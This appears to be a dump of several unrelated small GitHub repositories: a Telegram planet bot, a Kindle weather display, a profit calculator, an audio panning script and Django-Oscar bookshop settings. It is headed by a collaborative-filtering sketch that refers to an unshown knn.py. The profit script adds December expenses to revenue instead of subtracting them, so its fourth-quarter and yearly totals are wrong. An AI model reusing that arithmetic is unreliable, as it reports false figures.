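The knn.py record and README above describe the same collaborative-filtering loop: fit cosine-distance NearestNeighbors on the playlist-by-song incidence matrix, subtract the seed playlist's row from each neighbour's row, and vote on the songs left over. A condensed sketch of that loop with a made-up 5×4 toy matrix — every value below is illustrative, not taken from the project's data:

```python
import numpy as np
from collections import Counter
from scipy.sparse import csr_matrix
from sklearn.neighbors import NearestNeighbors

# Toy playlist-by-song incidence matrix (1 = song is on the playlist).
mat = csr_matrix(np.array([
    [1, 1, 0, 0],
    [1, 1, 1, 0],
    [1, 0, 1, 1],
    [0, 0, 1, 1],
    [1, 1, 0, 1],
]))

seed = 0
knn = NearestNeighbors(metric='cosine', algorithm='brute').fit(mat)
_, idx = knn.kneighbors(mat[seed], n_neighbors=4)

votes = Counter()
for i in idx.ravel()[1:]:          # skip the first hit: the seed itself
    diff = mat[i] - mat[seed]      # songs the neighbour has that the seed lacks
    diff.data[diff.data < 0] = 0   # drop songs only the seed has
    votes.update(diff.nonzero()[1])

print(votes.most_common(2))        # top candidate song columns to recommend
```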
zaharco17/astrobot
https://github.com/zaharco17/astrobot
447fd168295d1f85fcef5d06ecf4cccb08a3b394
11e92b09be1b7193e7a9865f770c1f3dd3a64808
ca5eac4f9d7f537fe6845ee6feb8e17da581b5bd
refs/heads/main
2023-05-03T11:37:38.664743
2021-05-31T21:46:47
2021-05-31T21:46:47
370,751,540
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6967508792877197, "alphanum_fraction": 0.6967508792877197, "avg_line_length": 15.29411792755127, "blob_id": "d45ce75481af0258fba5026161a2dae80af3072d", "content_id": "70719b018ab21df1d72c56ff70d69d46dd51f7f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/planet.py", "repo_name": "zaharco17/astrobot", "src_encoding": "UTF-8", "text": "import ephem\nimport datetime\n\na = \"Mercury\"\n\ndef planet(a):\n Pl = getattr(ephem,a)(datetime.date.today())\n constellation = ephem.constellation(Pl)\n return constellation\n\nprint (planet(a))\n \n\n\n\n\nplanets = 'Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus, Neptune'\n" }, { "alpha_fraction": 0.6979503631591797, "alphanum_fraction": 0.6990291476249695, "avg_line_length": 27.90625, "blob_id": "bba7b906eabbf1a174c5a9ae921828f5ad8dc56c", "content_id": "227b4b1ff94c7c110463b195eb61bd1c90cbc374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1044, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/astrobot.py", "repo_name": "zaharco17/astrobot", "src_encoding": "UTF-8", "text": "\nimport logging # для записи отчета о работе бота, импортитруем logging\nfrom telegram import update \nfrom telegram.ext import Updater, CommandHandler\nimport settings\nimport ephem\nimport datetime\n\n# записывать будет все сообщения уровня INFO и выше в файл bot.log\nlogging.basicConfig(filename='bot.log', level=logging.INFO)\n\ndef greet_user(update, context):\n print('Вызван /planet')\n ans = update.message.text.split()\n pl = ans[1]\n \n update.message.reply_text(f'созвездие, {planet(pl)}') # пишет в чат\n\ndef planet(pl):\n A = getattr(ephem,pl)(datetime.date.today()) \n constellation = ephem.constellation(A)\n return constellation \n\ndef main():\n mybot = Updater(settings.API_KEY, use_context=True) \n dp = mybot.dispatcher \n dp.add_handler(CommandHandler(\"planet\", greet_user))\n logging.info(\"Бот стартовал\") \n mybot.start_polling()\n mybot.idle()\n\nif __name__ == \"__main__\":\n main()\n\n" } ]
2
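A caveat on the astrobot record above: greet_user feeds raw user text straight into getattr(ephem, ...), so any unknown body name raises AttributeError (and a bare "/planet" with no argument raises IndexError on ans[1]); note also that ephem has no Earth body even though planet.py's trailing string lists one. A guarded lookup is one way to handle this — the whitelist and the None return below are my assumption, not the bot's current behaviour:

```python
import datetime
import ephem

# Bodies pyephem actually provides; deliberately excludes Earth.
PLANETS = {'Mercury', 'Venus', 'Mars', 'Jupiter', 'Saturn', 'Uranus', 'Neptune'}

def constellation_for(name):
    if name not in PLANETS:
        return None  # unknown body: let the caller reply with a usage hint
    body = getattr(ephem, name)(datetime.date.today())
    return ephem.constellation(body)  # (abbreviation, full name) tuple

print(constellation_for('Mars'))
print(constellation_for('Earth'))  # None - guarded instead of raising
```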
badboy/kindle-weather-display
https://github.com/badboy/kindle-weather-display
86af4ce015d400390caacacc59219298166baccd
78ffceb0357b5484f578fc1cdc3edad88a5dc118
92bd455d459e82f6904eec035df4282d4a2bade4
refs/heads/master
2020-05-29T11:36:38.213451
2015-05-16T09:29:56
2015-05-16T09:29:56
35,511,223
9
3
null
2015-05-12T20:34:01
2015-05-12T20:33:10
2014-09-04T02:12:54
null
[ { "alpha_fraction": 0.6300366520881653, "alphanum_fraction": 0.6531135439872742, "avg_line_length": 27.736841201782227, "blob_id": "f6a7c9eedb214a30cd7378041422dcc259fd1012", "content_id": "abae59e87b871e4901790c925184848961d4aa7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "permissive", "max_line_length": 154, "num_lines": 95, "path": "/server/weather-script.py", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2\n# coding=utf-8\n\n# Kindle Weather Display\n# Matthew Petroff (http://mpetroff.net/)\n# September 2012\n\nimport json\nimport datetime\nimport codecs\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept ImportError:\n # Python 2\n from urllib2 import urlopen\n\n#\n# Geographic location\n#\n\ncity = 'Aachen'\n\n#\n# Download and parse weather data\n#\n\nurl = 'http://api.openweathermap.org/data/2.5/forecast/daily?q=' + city + '&mode=json&units=metric&cnt=4'\n\n# Fetch data (change lat and lon to desired location)\nweather_json = urlopen(url).read()\ndata = json.loads(weather_json)\n\nicon_mappings = {\n '01d': 'skc', # Clear, sky is clear\n '02d': 'few',\n '03d': 'sct',\n '04d': 'ovc',\n '09d': 'ra',\n '10d': 'hi_shwrs', # Rain, light rain\n '11d': 'tsra',\n '13d': 'sn',\n '50d': 'fg',\n}\n\nhighs = []\nlows = []\nicons = []\nfor day in data['list']:\n hi = int(round(float(day['temp']['max'])))\n lo = int(round(float(day['temp']['min'])))\n highs.append(hi)\n lows.append(lo)\n icons.append(icon_mappings[day['weather'][0]['icon']])\n\n## Parse icons\n#xml_icons = dom.getElementsByTagName('icon-link')\n#icons = [None]*4\n#for i in range(len(xml_icons)):\n# icons[i] = xml_icons[i].firstChild.nodeValue.split('/')[-1].split('.')[0].rstrip('0123456789')\n\n# Parse dates\nday_one = datetime.datetime.fromtimestamp(data['list'][0]['dt'])\ntoday = datetime.datetime.now()\n\n#print(day_one)\n#print(highs)\n#print(lows)\n#print(icons)\n\none_day = datetime.timedelta(days=1)\ndays_of_week = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n#\n# Preprocess SVG\n#\n\n# Open SVG to process\noutput = codecs.open('weather-script-preprocess.svg', 'r', encoding='utf-8').read()\n\noutput = output.replace('UPDATE', \"updated \" + today.strftime(\"%H:%M\"))\noutput = output.replace('DATE', days_of_week[today.weekday()] + \", \" + day_one.strftime(\"%d.%m.%Y\"))\n\n# Insert icons and temperatures\noutput = output.replace('ICON_ONE',icons[0]).replace('ICON_TWO',icons[1]).replace('ICON_THREE',icons[2]).replace('ICON_FOUR',icons[3])\noutput = output.replace('HIGH_ONE',str(highs[0])).replace('HIGH_TWO',str(highs[1])).replace('HIGH_THREE',str(highs[2])).replace('HIGH_FOUR',str(highs[3]))\noutput = output.replace('LOW_ONE',str(lows[0])).replace('LOW_TWO',str(lows[1])).replace('LOW_THREE',str(lows[2])).replace('LOW_FOUR',str(lows[3]))\n\n# Insert days of week\noutput = output.replace('DAY_TWO',days_of_week[(day_one + 1*one_day).weekday()])\noutput = output.replace('DAY_THREE',days_of_week[(day_one + 2*one_day).weekday()])\noutput = output.replace('DAY_FOUR',days_of_week[(day_one + 3*one_day).weekday()])\n\n# Write output\ncodecs.open('weather-script-output.svg', 'w', encoding='utf-8').write(output)\n" }, { "alpha_fraction": 0.7253086566925049, "alphanum_fraction": 0.7746913433074951, "avg_line_length": 53, "blob_id": "9afa03d85af269675808d57ceded671e0f12399c", "content_id": "3764d58e08461d7fb38e60e61a815e4b6d1a20bf", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "permissive", "max_line_length": 103, "num_lines": 6, "path": "/README.md", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "# Using a Kindle for status information\n\nThis is the code to generate a status information / weather forecast image to be displayed on a Kindle.\nRead more [in the blog post](http://fnordig.de/2015/05/14/using-a-kindle-for-status-information/)\n\nOriginal: <http://www.mpetroff.net/archives/2012/09/14/kindle-weather-display/>\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.724252462387085, "avg_line_length": 36.625, "blob_id": "852bcba0ce3a9f497d7ff5af0f7e5d1269812a69", "content_id": "419ba67f59e48b635c5613715e1b1288a5fff73d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 301, "license_type": "permissive", "max_line_length": 97, "num_lines": 8, "path": "/server/weather-script.sh", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd \"$(dirname \"$0\")\"\n\npython2 weather-script.py && \\\nrsvg-convert --background-color=white -o weather-script-output.png weather-script-output.svg && \\\npngcrush -c 0 -ow weather-script-output.png #&& \\\n#cp -f weather-script-output.png /path/to/web/server/directory/weather-script-output.png\n" }, { "alpha_fraction": 0.6629834175109863, "alphanum_fraction": 0.6685082912445068, "avg_line_length": 12.923076629638672, "blob_id": "ce59c128c4abca73074eece25b895bcbff24b00e", "content_id": "750872b4d297fd1b5116206f533eb88f814ea2c5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 181, "license_type": "permissive", "max_line_length": 50, "num_lines": 13, "path": "/kindle/display-weather.sh", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd \"$(dirname \"$0\")\"\n\nrm -f display.png\neips -c\neips -c\n\nif wget -q http://server/path/to/display.png; then\n\teips -g display.png\nelse\n\teips -g weather-image-error.png\nfi\n" } ]
4
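One fragility in the weather-script.py record above: icon_mappings covers only the day-time OpenWeatherMap codes ('01d' through '50d'), so a night code such as '10n' would raise KeyError (and the "change lat and lon" comment is stale — the script queries by city). A tolerant lookup is a one-liner; normalizing night codes to their day twin and falling back to 'skc' are my assumptions, not the original script's behaviour:

```python
# Defensive icon lookup: map night codes to their day twin, default to clear sky.
icon_mappings = {
    '01d': 'skc', '02d': 'few', '03d': 'sct', '04d': 'ovc',
    '09d': 'ra', '10d': 'hi_shwrs', '11d': 'tsra', '13d': 'sn', '50d': 'fg',
}

def icon_for(code):
    day_code = code[:2] + 'd'            # '10n' -> '10d'
    return icon_mappings.get(day_code, 'skc')

assert icon_for('10n') == 'hi_shwrs'
assert icon_for('99x') == 'skc'          # unknown code falls back safely
```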
verticalg33k/profit_2019
https://github.com/verticalg33k/profit_2019
84054a9112375950e1fc8c9f8adf770db9cd2058
3a4d63383bb88439d6428605bb6f53d18323e54a
ff076f4e2732f6d636f1bd8b1541b89f2e39277a
refs/heads/master
2020-12-09T22:15:52.508240
2020-01-12T18:05:25
2020-01-12T18:05:25
233,431,241
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7313432693481445, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 32.5, "blob_id": "aa1f203fde8882607ef3099ed5343e02f05b9e69", "content_id": "73172e3db2c8bfb571ef1873fadfa6ddd5810147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 52, "num_lines": 2, "path": "/README.md", "repo_name": "verticalg33k/profit_2019", "src_encoding": "UTF-8", "text": "# profit_2019\nBasic code to input values and output yearly profit.\n" }, { "alpha_fraction": 0.7197609543800354, "alphanum_fraction": 0.7613847255706787, "avg_line_length": 43.12727355957031, "blob_id": "e492cc62adbf907b42aa727b8bafc6b125ead2f5", "content_id": "345c36c6a09d723dbc910ea2f586bf83192b9930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4853, "license_type": "no_license", "max_line_length": 114, "num_lines": 110, "path": "/profit_2019.py", "repo_name": "verticalg33k/profit_2019", "src_encoding": "UTF-8", "text": "#Hello, this is a simple code to calculate yearly profit for 2019.\nprint \"Welcome to the 2019 Profit Calculator!\"\nprint \"This tool will allow input of monthly data, compile it into quarterly data, and calculate year-end totals.\"\n\nprint \"Let's get to know each other.\"\nname = raw_input(\"What is your company's name?\")\nprint \"It's nice to meet you, %s! Let's get some information from you.\" % (name)\n#This first section takes first quarter profits and expenses and outputs monthly and first quarter totals.\njanuary_revenue = 1000\njanuary_expenses = 200\njanuary_profit = january_revenue - january_expenses\nprint \"Your profit for January 2019 is $\" + str(january_profit)\nfebruary_revenue = 3000\nfebruary_expenses = 700\nfebruary_profit = february_revenue - february_expenses\nprint \"Your profit for February 2019 is $\" + str(february_profit)\nmarch_revenue = 7000\nmarch_expenses = 400\nmarch_profit = march_revenue - march_expenses\nprint \"Your profit for March 2019 is $\" + str(march_profit)\n#This next section will add all of the expenses and profits for the first quarter of the year.\nquarter_1_expenses = january_expenses + february_expenses + march_expenses\nquarter_1_profits = january_profit + february_profit + march_profit\nprint \"Expenses are stacking up in the first quarter. 
Take a look at what you spent:\"\nprint \"Your total expenses for the first quarter were $\" + str(quarter_1_expenses)\nprint \"Yikes!\"\nprint \"However, you did a great job making profit.\"\nprint \"Your first quarter profits are $\" + str(quarter_1_profits)\nprint \"Great job!\"\n\n\n#Second quarter values\napril_revenue = 1000\napril_expenses = 800\napril_profit = april_revenue - april_expenses\nprint \"Your profit for April 2019 is $\" + str(april_profit)\nmay_revenue = 1500\nmay_expenses = 800\nmay_profit = may_revenue - may_expenses\nprint \"Your profit for May 2019 is $\" + str(may_profit)\njune_revenue = 1800\njune_expenses = 600\njune_profit = june_revenue - june_expenses\nprint \"Your profit for June 2019 is $\" + str(june_profit)\n#Second quarter totals\nquarter_2_expenses = april_expenses + may_expenses + june_expenses\nquarter_2_profits = april_profit + may_profit + june_profit\nprint \"Let's take a look at how you did in the second quarter of 2019.\"\nprint \"Your second quarter expenses were $\" + str(quarter_2_expenses)\nprint \"Wow!\"\nprint \"Now, for the most important information:\"\nprint \"Your Quarter 2 profits are $\" + str(quarter_2_profits)\nprint \"That's terrible. See if you can do better next quarter.\"\n\n\n#Third quarter values\njuly_revenue = 2500\njuly_expenses = 600\njuly_profit = july_revenue - july_expenses\nprint \"Your profit for July 2019 is $\" + str(july_profit)\naugust_revenue = 3000\naugust_expenses = 550\naugust_profit = august_revenue - august_expenses\nprint \"Your profit for August 2019 is $\" + str(august_profit)\nseptember_revenue = 4000\nseptember_expenses = 650\nseptember_profit = september_revenue - september_expenses\nprint \"Your profit for September 2019 is $\" + str(september_profit)\n#Third quarter totals\nquarter_3_profits = july_profit + august_profit + september_profit\nquarter_3_expenses = july_expenses + august_expenses + september_expenses\nprint \"Are you ready for your third quarter totals?\"\nprint \"Let's see how you did.\"\nprint \"Your third quarter expenses are $\" + str(quarter_3_expenses)\nprint \"Much better!\"\nprint \"Your third quarter profits are $\" + str(quarter_3_profits)\nprint \"What an improvement!\"\n\n\n#Fourth quarter values\noctober_revenue = 5000\noctober_expenses = 750\noctober_profit = october_revenue - october_expenses\nprint \"Your profit for October 2019 is $\" + str(october_profit)\nnovember_revenue = 6000\nnovember_expenses = 800\nnovember_profit = november_revenue - november_expenses\nprint \"Your profit for November 2019 is $\" + str(november_profit)\ndecember_revenue = 10000\ndecember_expenses = 700\ndecember_profit = december_revenue + december_expenses\nprint \"Your profit for December 2019 is $\" + str(december_profit)\n#Fourth quarter totals\nquarter_4_expenses = october_expenses + november_expenses + december_expenses\nquarter_4_profits = october_profit + november_profit + december_profit\nprint \"Let's finish the year strong! 
How did you do?\"\nprint \"Your fourth quarter expenses were $\" + str(quarter_4_expenses)\nprint \"Nice job reigning in your spending!\"\nprint \"Drumroll please!\"\nprint \"Your fourth quarter profits were $\" + str(quarter_4_profits)\nprint \"Amazing!\"\n\n#Year 2019 totals for all four quarters\ntotal_2019_expenses = quarter_1_expenses + quarter_2_expenses + quarter_3_expenses + quarter_4_expenses\ntotal_2019_profit = quarter_1_profits + quarter_2_profits + quarter_3_profits + quarter_4_profits\nprint \"Let's see how much money you spent in 2019.\"\nprint \"Your total 2019 expenses were $\" + str(total_2019_expenses)\nprint \"Not too bad.\"\nprint \"Finally, your total 2019 profit is $\" + str(total_2019_profit)\nprint \"What a great year!\"" } ]
2
Xiaoyang-Pan/MovingSounds
https://github.com/Xiaoyang-Pan/MovingSounds
c05fa4dce3cff1935338e7c195fd9d2e7c639468
507f93c728d7b4783b5d7b17597a0e4039270857
8de89bc62f6429150b4869ac03e6476fa42091dc
refs/heads/master
2022-12-01T23:51:39.358455
2020-08-19T22:22:25
2020-08-19T22:22:25
288,288,877
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.7549406886100769, "avg_line_length": 24.299999237060547, "blob_id": "87b2a426f7ee5b0fb4332768f641bf61042e04a5", "content_id": "5ce9f5d34f7aa6aea98fbb72530ecba54bd76df3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/convert.py", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "#convert mp3 file to wav file\nfrom pydub import AudioSegment\n\n#source and dst music file names\nsrc = 'typewriter.mp3'\ndst = 'typewriter.wav'\n\n#import mp3 file and export as a wave file\nsound = AudioSegment.from_mp3(src)\nsound.export(dst,format = 'wav')\n" }, { "alpha_fraction": 0.6101922392845154, "alphanum_fraction": 0.6327670812606812, "avg_line_length": 42.86274337768555, "blob_id": "f0eae4055cad14ad728b8b43316029ccf3c10ee7", "content_id": "d4752f849ccd7de30303233a56c836d5b0dc272d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4474, "license_type": "no_license", "max_line_length": 138, "num_lines": 102, "path": "/movingsound.py", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "########################################################################\n# #\n# Playing moving Sound in headphones #\n# #\n# 1.Imported a wave audio file #\n# 2.Controlled the magnitude of input audio signals #\n# 3.Added a time dealy to the input audio signals #\n# 4.Outputted and Played a wave file with moving sound effects #\n# #\n########################################################################\n\nimport soundfile as sf\nimport numpy as np\nfrom pydub import AudioSegment\nfrom pydub.playback import play\n\n#import input music wave file\ndata, samplerate = sf.read('typewriter.wav')\n\naudio_sample = data.shape[0]\n\n#Determine the channel size\nif len(data.shape) == 2:\n channels = data.shape[1]\nelif len(data.shape) == 1:\n channels = 2\n data = data.reshape(audio_sample,1)\n data = data.repeat(2,1)\n\n#choose the time offset between the left and right sterro sound\n#between 0.001% of the number of audio samples read\ntime_offset = round(1*(10**(-5))*audio_sample)\ntotal_sample = round(2*time_offset+audio_sample)\n\n#Initialize the coefficient matric\nleft_coe = np.zeros((total_sample,1))\nright_coe = np.zeros((total_sample,1))\n\n#Controlled the magnitude of the audio signal respect to its total number of audio samples\nratio = 1.0/audio_sample\n\n\n#obtain a user input ranged from 1 to 2\n#1 means slowest sound moving speed, 2 means fastest sound moving speed.\nfactor = input(\"Please enter a number between 1 to 2; it relates to the speed of moving sounds: \")\nwhile True:\n try :\n factor = float(factor)\n \n if factor <1 or factor >2:\n factor = float(input(\"Your input is invalid. Please enter a number between 1 to 2: \"))\n else:\n break\n except:\n factor = input(\"Your input is invalid. 
Please enter a number between 1 to 2: \")\n\n\n#Create a coefficient matrix to controll the magintude of the audio samples\n#The sounds start from left moving to right in the beginning, and moving back to the right in the end\nfor i in range(total_sample):\n if i <= time_offset:\n left_coe[i] = 1-i*ratio*factor\n right_coe[i] = 0\n elif i <=audio_sample/2:\n left_coe[i] = 1-i*ratio*factor\n right_coe[i] = (i-time_offset)*ratio*factor\n elif i <= audio_sample/2+time_offset:\n left_coe[i] = 1-audio_sample/2*ratio*factor\n right_coe[i] = (i-time_offset)*ratio*factor\n elif i <= audio_sample/2+2*time_offset:\n left_coe[i] = 1-audio_sample/2*ratio*factor\n right_coe[i] = audio_sample/2*factor*ratio\n else:\n left_coe[i] = 1-audio_sample/2*ratio*factor + (i-audio_sample/2-2*time_offset)*ratio*factor\n right_coe[i] = audio_sample*factor*ratio-(i-audio_sample/2-2*time_offset)*ratio*factor\n\n\nnew_left = np.zeros((total_sample,1))\nnew_right = np.zeros((total_sample,1))\n\n#matrix multiplication\ndef matrix_multiply(coe_matrix,audio_data,start_in,end_in,audio_index,offset):\n return np.multiply(coe_matrix[start_in+offset:end_in+offset,0],audio_data[start_in:end_in,audio_index])\n\n\n#obtain the moving left and right steroe sounds by multiply the coefficient matrixs with the original values\nnew_left[0:audio_sample//2,0] = matrix_multiply(left_coe,data,0,audio_sample//2,0,0)\nnew_left[audio_sample//2:audio_sample//2+2*time_offset,0] = left_coe[audio_sample//2,0]*data[audio_sample//2,0]\nnew_left[audio_sample//2+2*time_offset:total_sample,0] = matrix_multiply(left_coe,data,audio_sample//2,audio_sample,0,2*time_offset)\n\nnew_right[time_offset:audio_sample//2+time_offset,0] = matrix_multiply(right_coe,data,0,audio_sample//2,1,time_offset)\nnew_right[audio_sample//2+time_offset:audio_sample//2+2*time_offset,0] =right_coe[audio_sample//2+time_offset,0] * data[audio_sample//2,1]\nnew_right[audio_sample//2+2*time_offset:,0] = matrix_multiply(right_coe,data,audio_sample//2,audio_sample,1,2*time_offset)\n\n#and concatenate two matric and turn into one audio file\n#output the result as a wav file\nnew_song = np.concatenate((new_left[:,0:1],new_right),axis = 1)\nsf.write('new_typerwriter.wav',new_song,samplerate)\n\n#play the audio file with moving effects\nplay_back = AudioSegment.from_wav('new_typerwriter.wav')\nplay(play_back)\n" }, { "alpha_fraction": 0.7824709415435791, "alphanum_fraction": 0.7898627519607544, "avg_line_length": 51.61111068725586, "blob_id": "8dbe2f0f13d10857e615450e3fa02680155a6af3", "content_id": "5787fedc3c760da052c9c9607ae52acc09fec5ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 947, "license_type": "no_license", "max_line_length": 122, "num_lines": 18, "path": "/README.md", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "# MovingSounds\n\nThis project aims to creating a sound moving effect using signal processing techniques. 
\nAdd time delays to the sound and manipulate the magnitudes of left and right stereo sounds to create a moving sound effect\nThe results audio file will move from left to right, and from right to left\nCodes were implemented using Python and MATLAB\n\n## Python Version\n* Various libraray, such as SoundFile, NumPy, pydub, are needed to be installed\n* mp3 and wave file are supported, but mp3 files must be converted to wave file before processing using convert.py\n* Users need to enter a number between 1 and 2, which is related to the speed of moving sounds\n* Resulted file will be played in the end\n\n## MATLAB VERSION\n* Signal Processing Toolbox is needed to be installed\n* mp3 and wave files are supported\n* Users need to enter a number between 1 and 2, which is related to the speed of moving sounds\n* Resulted file will be played in the end\n" } ]
3
halfnibble/oscar-demo
https://github.com/halfnibble/oscar-demo
8eac2aed4fbec5ca5b21bd8310814c091b5757e9
ae67f1b1751564676f79096ef993cff00ed42fd3
eceea36427547ba94c58503d115397d224a2b549
refs/heads/master
2021-01-22T07:32:41.654107
2014-10-16T05:06:22
2014-10-16T05:06:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5623435974121094, "alphanum_fraction": 0.5653014779090881, "avg_line_length": 26.29813575744629, "blob_id": "ef7314fdf474865cd4d4b823adccf92e02c4775c", "content_id": "cfb8033f98c21410051309245cb1f7c6e73b8b59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8790, "license_type": "no_license", "max_line_length": 78, "num_lines": 322, "path": "/bookshop/bookshop/settings.py", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "\"\"\"\nDjango settings for bookshop project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nPROJECT_DIR = os.path.dirname(__file__)\nlocation = lambda x: os.path.join(\n os.path.dirname(os.path.realpath(__file__)), x)\n\n# Retreive secret settings\nfrom .secret import *\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n 'oscar.apps.search.context_processors.search_form',\n 'oscar.apps.promotions.context_processors.promotions',\n 'oscar.apps.checkout.context_processors.checkout',\n 'oscar.apps.customer.notifications.context_processors.notifications',\n 'oscar.core.context_processors.metadata',\n)\n\nfrom oscar import OSCAR_MAIN_TEMPLATE_DIR\n\nTEMPLATE_DIRS = (\n location('templates'),\n os.path.join(OSCAR_MAIN_TEMPLATE_DIR, 'templates'),\n OSCAR_MAIN_TEMPLATE_DIR,\n)\n\nALLOWED_HOSTS = []\n\n\n# Application definition\nfrom oscar import get_core_apps\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.flatpages',\n 'south',\n 'compressor',\n 'paypal',\n] + get_core_apps([\n 'apps.shipping',\n 'apps.checkout'])\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'oscar.apps.basket.middleware.BasketMiddleware',\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'oscar.apps.customer.auth_backends.Emailbackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nROOT_URLCONF = 'bookshop.urls'\n\nWSGI_APPLICATION = 'bookshop.wsgi.application'\n\n\n# Database\n# 
https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'oscar_demo',\n 'USER': DB_USERNAME,\n 'PASSWORD': DB_PASSWORD,\n 'HOST': '',\n 'PORT': '',\n 'ATOMIC_REQUESTS': True, # Django 1.6+\n }\n}\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n },\n}\n\nSITE_ID = 1\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'bookshop', 'static')\n\n# Media files\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'bookshop', 'media')\n\nfrom oscar.defaults import *\n\n# Order pipeline\nOSCAR_INITIAL_ORDER_STATUS = 'Pending'\nOSCAR_INITIAL_LINE_STATUS = 'Pending'\nOSCAR_ORDER_STATUS_PIPELINE = {\n 'Pending': ('Being processed', 'Cancelled',),\n 'Being processed': ('Processed', 'Cancelled',),\n 'Cancelled': (),\n}\n\n# Override Oscar settings\nOSCAR_SHOP_NAME = 'Port Bookstore'\nOSCAR_SHOP_TAGLINE = 'Great Books for Geeks!'\nOSCAR_DEFAULT_CURRENCY = 'USD'\nOSCAR_CURRENCY_LOCALE = 'en_US'\n\n# PayPal Payflow\nOSCAR_ALLOW_ANON_CHECKOUT = True\n\n# Taken from PayPal's documentation - these should always work in the sandbox\nPAYPAL_SANDBOX_MODE = True\nPAYPAL_CALLBACK_HTTPS = False\nPAYPAL_API_VERSION = '88.0'\n\nPAYPAL_PAYFLOW_DASHBOARD_FORMS = True\n\n# Add Payflow dashboard stuff to settings\nfrom django.utils.translation import ugettext_lazy as _\n\ndef display_menu(user, url_name, url_args=None, url_kwargs=None):\n\t# Don't display catalogue for certain users\n\tstaff_only = ['[email protected]',]\n\tif user.email in staff_only:\n\t\treturn False\n\telse:\n\t\treturn True\n\nOSCAR_DASHBOARD_NAVIGATION = [\n {\n 'label': _('Dashboard'),\n 'icon': 'icon-th-list',\n 'url_name': 'dashboard:index',\n },\n {\n 'label': 